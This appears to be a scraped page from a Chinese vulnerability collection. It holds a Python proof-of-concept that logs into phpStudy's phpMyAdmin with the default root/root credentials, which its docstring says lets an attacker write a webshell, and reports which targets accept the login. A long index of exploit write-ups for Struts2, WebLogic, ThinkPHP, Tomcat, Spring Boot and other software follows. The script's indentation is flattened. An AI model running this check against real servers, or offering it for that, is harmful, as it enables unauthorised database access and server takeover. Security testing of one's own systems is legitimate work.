#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: phpstudy phpmyadmin默认密码漏洞
referer: wooyun-2015-094933
author: Lucifer
description: phpstudy的默认phpmyadmin后台存在默认用户名密码可写shell。
'''
import sys
import json
import requests
import warnings
def run(url):
result = ['phpstudy phpmyadmin默认密码漏洞','','']
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
"Content-Type":"application/x-www-form-urlencoded",
}
payload = "/phpmyadmin/index.php"
vulnurl = url + payload
post_data = {
"pma_username":"root",
"pma_password":"root",
"server":"1",
"target":"index.php"
}
try:
sess = requests.Session()
req = sess.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
req2 = sess.get(vulnurl, headers=headers, timeout=10, verify=False)
if r"navigation.php" in req2.text and r"frame_navigation" in req.text:
result[2]= '存在'
result[1] = vulnurl+"\tpost: "+json.dumps(post_data, indent=4)
else:
result[2]= '不存在'
except:
result[2]='不存在'
return result
if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = run(sys.argv[1])
常见组件漏洞的目录
ActiveMQ
Aerospike
Apache
Apache-Axis
Apache-Flink
Apache-FusionAuth
Apache-JMeter
Apache-Kylin
Apache-POI
Apache-SSI
Apache-ShardingSphere
Apache-Shiro
Apache-Solr
Apache-Spark
Apache-Struts
-CVE-2013-1966-CVE-2013-2115-S2-014Apache-Struts-漏洞列表快速查阅CVE-2007-4556-s2-001CVE-2008-6504-S2-003CVE-2010-1870-s2-005CVE-2011-3923-s2-009CVE-2012-0391-s2-008CVE-2012-0838-s2-007CVE-2013-1965-s2-012CVE-2013-1966-s2-013CVE-2013-2135-CVE-2013-2134-s2-015CVE-2013-2248-s2-017CVE-2013-2251-s2-016CVE-2013-4316-s2-019CVE-2016-0785-S2-029CVE-2016-3081-s2-032CVE-2016-3087-s2-033CVE-2016-4438-s2-037CVE-2016-6795-s2-042CVE-2017-12611-S2-053CVE-2017-5638-S2-045CVE-2017-5638-s2-046CVE-2017-7525-s2-055CVE-2017-9791-s2-048CVE-2017-9805-s2-052CVE-2018-11776-s2-057CVE-2018-1327-S2-056CVE-2019-0230-s2-09CVE-xxxx-xxxx-s2-002
Apereo-CAS
Atlassian-Jira
Citrix
Cobub-razor
Confluence
Coremail
Django
Elasticsearch
FasterXML-jackson
CVE-2019-12384--CVE-2019-12814-FasterXML-jackson-databind-反序列化漏洞CVE-2019-14540-FasterXML-jackson-databind-远程命令执行漏洞CVE-2020-14060-FasterXML-jackson-databind-反序列化漏洞CVE-2020-14062-FasterXML-jackson-databind-反序列化漏洞CVE-2020-14195-FasterXML-jackson-databind-反序列化漏洞CVE-2020-24616-FasterXML-jackson-databind-远程命令执行漏洞CVE-2020-8840-FasterXML-jackson-databind-远程代码执行漏洞
Fastjson
Hadoop
ImageMagick
Jboss/反序列化漏洞
Jboss/访问控制不严导致的漏洞
Jenkins
Jinja2
Joomla
CVE-2015-8562-Joomla-3.4.5-反序列化漏洞CVE-2016-8869-Joomla-3.4.4-3.6.3-未授权创建特权用户CVE-2017-14596-Joomla!-1.5-_=-3.7.5-LDAP注入绕过登录认证CVE-2017-8917-Joomla-3.7.0-QL注入漏洞CVE-2020-10238-Joomla-_=-3.9.15-远程命令执行漏洞CVE-2020-11890-Joomla-远程命令执行漏洞Joomla!-com_fabrik-3.9.11-目录遍历漏洞Joomla!-com_hdwplayer-4.2---'search.php'-sql注入Joomla!-component-GMapFP-3.30-任意文件上传Joomla-3-3.4.6-远程命令执行漏洞Joomla-3.4.6---'configuration.php'-Remote-Code-ExecutionJoomscan
Nginx
Php
Php/Php-screw加密与破解
SQL-Server
SharePoint
Spring-Boot
Spring-Boot-Actuator-hikari配置不当导致的远程命令执行漏洞Spring-Boot-Actuator-jolokia-配置不当导致的XXE漏洞Spring-Boot-Actuator-jolokia-配置不当导致的rce漏洞Spring-Boot-Thymeleaf-模板注入Spring-Boot-Tomcat导致的JNDI注入Spring-Boot-eureka-xstream-deserialization-rceSpring-Boot-h2-database-query-rceSpring-Boot-mysql-jdbc-deserialization-rceSpring-Boot-sqlSpring-Boot-whitelabel-error-page-SpEL-rceSpring-Boot-修改环境属性导致的rceSpring-Boot-提取内存密码Spring-Boot-获取被星号脱敏的密码的明文Spring-Boot-路由地址及接口调用详情泄漏Spring-Boot-配置不当而暴露的路由
Spring-Cloud
Spring-Messaging
Spring-Security-Oauth
Spring-Statemachine
Spring-WebFlow
Struts2
Struts2/S2-048(CVE-2017-9791)
Struts2/Struts2-Scan
Struts2/Struts2_045-Poc
Struts2/Struts2_045-Poc/Search_S2_045
Thinkphp
Thinkphp-2.X-RCE漏洞Thinkphp-2.X-RCE漏洞环境搭建Thinkphp-3.2.3-缓存漏洞Thinkphp-5.0.(0-21)&5.1.(3-25)sql注入漏洞Thinkphp-5.0.(13-15)&5.1.(0-5)-sql注入漏洞Thinkphp-5.0.(7-22)&5.1.(0-30)远程代码执行漏洞Thinkphp-5.0.10-sql注入漏洞Thinkphp-5.1.(16-22)-sql注入漏洞Thinkphp-5.1.(6-8)-sql注入漏洞Thinkphp-5.x远程代码执行漏洞环境Thinkphp-5.x远程命令执行漏洞Thinkphp-全版本sql注入漏洞Thinkphp5文件包含漏洞thinkphpthinkphp5命令执行thinkphp5框架缺陷导致远程代码执行
Thinkphp/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷
Thinkphp/ThinkPHP_5.X_远程代码执行漏洞
Tomcat
CVE-2016-1240-Tomcat本地提权漏洞CVE-2016-8735-Tomcat-反序列化漏洞CVE-2017-12615-Tomcat-PUT方法任意文件写入漏洞CVE-2017-12616-Tomcat-信息泄露CVE-2017-12617-Tomcat-RCE-via-JSP-Upload-BypassCVE-2018-1305-Tomcat-安全绕过漏洞CVE-2019-0221-Apache-Tomcat-SSI-printenv指令中的XSSCVE-2019-0232-Tomcat-rceCVE-2020-1938-Apache-Tomcat-文件包含漏洞CVE-2020-9484-Tomcat-session反序列化漏洞Tomcat-后台爆破Tomcat-后台部署war木马getshellTomcat样例目录session操纵漏洞基于Tomcat的内存Webshell-无文件攻击技术通过jmx攻击Tomcat
Tomcat/Tomcat-URL-解析差异性导致的安全问题
Tomcat/Tomcat-URL-解析差异性导致的安全问题/URL差异性
Tomcat/Tomcat-URL-解析差异性导致的安全问题/调试分析
Weblogic
CVE-2017-10271-Weblogic-XMLDecoder-反序列化漏洞CVE-2017-3248-Weblogic-反序列化漏洞CVE-2017-3506-Weblogic反序列化漏洞CVE-2018-2628-Weblogic反序列化漏洞CVE-2018-2893-Weblogic-WLS核心组件反序列化漏洞CVE-2018-2894-Weblogic任意文件上传CVE-2018-3191-Weblogic远程代码执行漏洞CVE-2018-3245-Weblogic反序列化远程代码执行漏洞CVE-2019-2615-Weblogic-任意文件读取漏洞CVE-2019-2618-Weblogic任意文件上传漏洞CVE-2019-2725-CNVD-C-2019-48814-Weblogic反序列化远程代码执行漏洞CVE-2019-2729-Weblogic反序列化漏洞CVE-2019-2888-Weblogic-EJBTaglibDescriptor-XXE漏洞CVE-2019-2890-Weblogic反序列化漏洞CVE-2020-2551-Weblogic-CVE-2020-2551-IIOP协议反序列化rceCVE-2020-2555-Oracle-CoherenceWeblogic-反序列化远程代码执行漏洞CVE-2020-2883-Weblogic-远程代码执行漏洞weblogic爆破WebLogic远程代码执行漏洞-CVE-2021-2109
mini_httpd
齐治堡垒机
FreeMarker
jumpserver
fastjsoon
Lanproxy
Microsoft
Microsoft/Microsoft-Exchange
Microsoft/Microsoft-SharePoint
Microsoft/Microsoft-Windows-Print-Spooler
Microsoft/Windows-DNS-Server
Couchdb
Winmail
Microsoft-IE